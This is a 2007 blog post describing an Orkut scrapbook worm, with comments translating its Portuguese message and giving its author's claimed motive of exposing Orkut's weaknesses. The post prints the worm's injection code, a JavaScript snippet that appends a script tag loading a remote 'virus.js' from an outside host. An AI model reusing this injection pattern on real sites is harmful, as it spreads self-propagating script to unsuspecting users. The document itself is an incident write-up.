Tuesday, December 18, 2007

Orkut "virus"

More of a worm, actually.

I had an email from Orkut this evening telling me I had a new scrapbook entry. I don't really use Orkut, but I signed up a while back, and friended a bunch of people I know. The scrapbook entry was a bit cryptic:
2008 vem ai... que ele comece mto bem para vc

I still don't know exactly what it means, I'm assuming it's Portuguese. Babelfish wasn't any help. I won't mention who I got it from, but I will admit that if you are friended by me on Orkut, I probably gave you a copy too. Fortunately, it looks like Orkut is actively and quickly deleting them, to stop the spread. I say completely unsarcastically, good job Orkut on the quick response!

I haven't done any kind of through analysis yet, but it looks like a Javascript worm that kicks in via a Flash XSS? My HTML/Javascript/Flash-fu is pretty darn weak. This is what it looked like:

<div id="flashDiv295378627"><embed type="application/x-shockwave-flash" src="Scrapbook_files/LoL.html" style="" id="295378627" name="295378627" bgcolor="#FFFFFF" quality="autohigh" wmode="transparent" allownetworking="internal" allowscriptaccess="never" height="1" width="1"></embed></div><script type="text/javascript"> var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '295378627', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '295378627'); flashWriter._addParam('wmode', 'transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape(''); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv295378627');</script>

Looks like it joins you to an Orkut group, too:

Infectados pelo VĂ­rus do Orkut.

Owner of the group is a new-looking account named "Virus do Orkut". Also, listed at the end of the virus.js file is this: author="Rodrigo Lacerda"


Alfredo said...

2008 vem ai... que ele comece mto bem para vc

2008 is coming... that it starts very well for you

Ryan Russell said...

Excellent, thanks! Brazilian Portuguese, then?

Anything interesting on the Orkut group page for infected people?

Alfredo said...

Yes is Brazilian Portuguese. It is a conceptual virus. Also the idealizer clarifies its intentions in the page of the community.

Alfredo said...

Something interesting? You are making some joke? But the same idiotic things of always, but with a bigger intensity.

Ryan Russell said...

Interesting as in, I can't read Portuguese. ;) I was hoping you would continue the free translation service, and tell me the main points of what he had to say for himself.

For example, what's his excuse for infecting almost 400,000 users?

Alfredo said...

Only to show the fragilities of Orkut. Here, in Brazil, it´s a very famous site. And the majority of the users is completely newbie/noob. My mother is included. Therefore a bug like this could affect people sufficiently.

More aswers tomorow. i need to sleep. is 03:47 a.m. right now

See you!